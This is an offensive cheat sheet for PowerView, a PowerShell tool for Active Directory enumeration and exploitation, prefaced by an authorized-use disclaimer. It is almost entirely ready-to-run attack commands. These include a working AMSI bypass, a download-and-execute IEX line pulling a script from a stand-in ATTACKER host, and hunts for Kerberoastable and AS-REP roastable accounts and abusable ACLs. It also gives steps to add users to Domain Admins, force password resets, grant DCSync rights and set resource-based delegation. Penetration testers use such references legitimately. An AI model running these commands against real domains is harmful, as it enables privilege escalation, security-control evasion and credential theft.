POWERVIEW
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
PowerView is a PowerShell tool for Active Directory enumeration. Part of PowerSploit, essential for AD reconnaissance and exploitation.
LOADING#
FROM DISK#
Import-Module .\PowerView.ps1 . .\PowerView.ps1
FROM URL#
IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER/PowerView.ps1')
AMSI BYPASS FIRST#
# Bypass AMSI then load
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER/PowerView.ps1')
DOMAIN ENUMERATION#
DOMAIN INFO#
Get-Domain # Current domain Get-Domain -Domain other.local # Specific domain Get-DomainSID # Domain SID Get-DomainPolicy # Domain policy (Get-DomainPolicy)."SystemAccess" # Password policy Get-DomainController # Domain controllers
USERS#
Get-DomainUser # All users Get-DomainUser -Identity admin # Specific user Get-DomainUser -SPN # Users with SPN (Kerberoastable) Get-DomainUser -PreAuthNotRequired # AS-REP Roastable Get-DomainUser -AdminCount # Privileged users Get-DomainUser -TrustedToAuth # Constrained delegation # User properties Get-DomainUser -Identity admin -Properties * Get-DomainUser | Select samaccountname,description # Search in description Get-DomainUser -LDAPFilter "(description=*pass*)" | Select samaccountname,description
GROUPS#
Get-DomainGroup # All groups Get-DomainGroup -Identity "Domain Admins" Get-DomainGroupMember -Identity "Domain Admins" Get-DomainGroupMember -Identity "Domain Admins" -Recurse # Interesting groups Get-DomainGroup *admin* Get-DomainGroup -AdminCount # User's groups Get-DomainGroup -UserName "username"
COMPUTERS#
Get-DomainComputer # All computers Get-DomainComputer -Ping # Only online Get-DomainComputer -OperatingSystem "*Server*" Get-DomainComputer -Unconstrained # Unconstrained delegation Get-DomainComputer -TrustedToAuth # Constrained delegation # Computer properties Get-DomainComputer -Identity DC01 -Properties *
OUs#
Get-DomainOU # All OUs Get-DomainOU -Identity "Servers" Get-DomainOU | Select name,distinguishedname # Computers in OU Get-DomainComputer -SearchBase "OU=Servers,DC=domain,DC=local"
GPOs#
Get-DomainGPO # All GPOs Get-DomainGPO -Identity "Default Domain Policy" Get-DomainGPO -ComputerIdentity DC01 # GPOs applied to computer # GPO local groups Get-DomainGPOLocalGroup Get-DomainGPOUserLocalGroupMapping -Identity admin
ACL ENUMERATION#
BASIC ACL#
Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs
# Specific rights
Get-DomainObjectAcl -Identity admin -ResolveGUIDs | ? {$_.ActiveDirectoryRights -match "GenericAll|Write|Self"}
# Find interesting ACEs for user
Find-InterestingDomainAcl -ResolveGUIDs | ? {$_.IdentityReferenceName -match "username"}
COMMON ABUSABLE RIGHTS#
# GenericAll - Full control # GenericWrite - Modify attributes # WriteOwner - Change owner # WriteDACL - Modify ACL # Self - Add self to group # ForceChangePassword - Reset password # AllExtendedRights - All extended rights # AddMembers - Add members to group
DCSync RIGHTS#
# Check for DCSync rights
Get-DomainObjectAcl -SearchBase "DC=domain,DC=local" -ResolveGUIDs | ? {
($_.ActiveDirectoryRights -match "GenericAll") -or
($_.ObjectAceType -match "DS-Replication-Get-Changes")
}
FIND MISCONFIGURATIONS#
# Users with SPN (Kerberoastable)
Get-DomainUser -SPN | Select samaccountname,serviceprincipalname
# AS-REP Roastable
Get-DomainUser -PreAuthNotRequired | Select samaccountname
# Unconstrained Delegation
Get-DomainComputer -Unconstrained
Get-DomainUser -AllowDelegation -AdminCount
# Constrained Delegation
Get-DomainComputer -TrustedToAuth | Select dnshostname,msds-allowedtodelegateto
Get-DomainUser -TrustedToAuth | Select samaccountname,msds-allowedtodelegateto
# LAPS
Get-DomainComputer | Get-DomainObjectAcl -ResolveGUIDs | ? {$_.ObjectAceType -match "ms-Mcs-AdmPwd"}
# AdminSDHolder abuse
Get-DomainObjectAcl -SearchBase "CN=AdminSDHolder,CN=System,DC=domain,DC=local" -ResolveGUIDs
LOCAL ENUMERATION#
# Local admins on remote computer Get-NetLocalGroup -ComputerName target Get-NetLocalGroupMember -ComputerName target -GroupName "Administrators" # Logged on users Get-NetLoggedon -ComputerName target # Sessions Get-NetSession -ComputerName target # Shares Get-NetShare -ComputerName target
FIND WHERE USER HAS ACCESS#
# Where current user is local admin Find-LocalAdminAccess # Where user has session Find-DomainUserLocation # Where group members have session Find-DomainUserLocation -GroupName "Domain Admins" # Where specific user has session Find-DomainUserLocation -UserIdentity admin
FOREST/TRUST ENUMERATION#
# Forest info Get-Forest Get-ForestDomain # Trusts Get-DomainTrust Get-DomainTrust -Domain other.local Get-ForestTrust # Foreign group members Get-DomainForeignGroupMember # Foreign user membership Get-DomainForeignUser
FILE SHARES#
# Find shares Find-DomainShare # Writable shares Find-DomainShare -CheckShareAccess # Find interesting files Find-InterestingDomainShareFile Find-InterestingDomainShareFile -Include "*.config","*.ps1","*password*"
EXPLOITATION HELPERS#
SET SPN (Kerberoast Target)#
# If you have write access to user
Set-DomainObject -Identity targetuser -Set @{serviceprincipalname='fake/spn'}
Get-DomainSPNTicket -SPN "fake/spn"
ADD TO GROUP#
# If you have AddMembers right Add-DomainGroupMember -Identity "Domain Admins" -Members "controlled_user"
MODIFY USER#
# Force password reset (if ForceChangePassword)
Set-DomainUserPassword -Identity target -AccountPassword (ConvertTo-SecureString 'Password123!' -AsPlainText -Force)
# Disable pre-auth (if GenericAll/Write)
Set-DomainObject -Identity target -XOR @{useraccountcontrol=4194304}
MODIFY ACL#
# If WriteDACL Add-DomainObjectAcl -TargetIdentity "Domain Admins" -PrincipalIdentity controlled_user -Rights All
DCSync#
# If replication rights Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=local" -PrincipalIdentity user -Rights DCSync
RBCD#
# Set RBCD on target
Set-DomainObject -Identity TARGET$ -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SD}
# Build security descriptor
$sid = Get-DomainComputer ATTACKER$ -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$sid)"
$SDbytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDbytes,0)
SHARPVIEW#
# C# version for use without PowerShell # Download: https://github.com/tevora-threat/SharpView SharpView.exe Get-DomainUser -Identity admin SharpView.exe Get-DomainGroup -Identity "Domain Admins" SharpView.exe Find-LocalAdminAccess
QUICK REFERENCE#
Get-Domain # Domain info Get-DomainUser -SPN # Kerberoastable Get-DomainUser -PreAuthNotRequired # AS-REP roastable Get-DomainComputer -Unconstrained # Unconstrained delegation Get-DomainGroupMember "Domain Admins" -Recurse # DA members Find-LocalAdminAccess # Where user is admin Find-DomainUserLocation # Where users logged in Get-DomainObjectAcl -ResolveGUIDs # ACL enumeration Get-DomainTrust # Domain trusts Find-InterestingDomainShareFile # Interesting files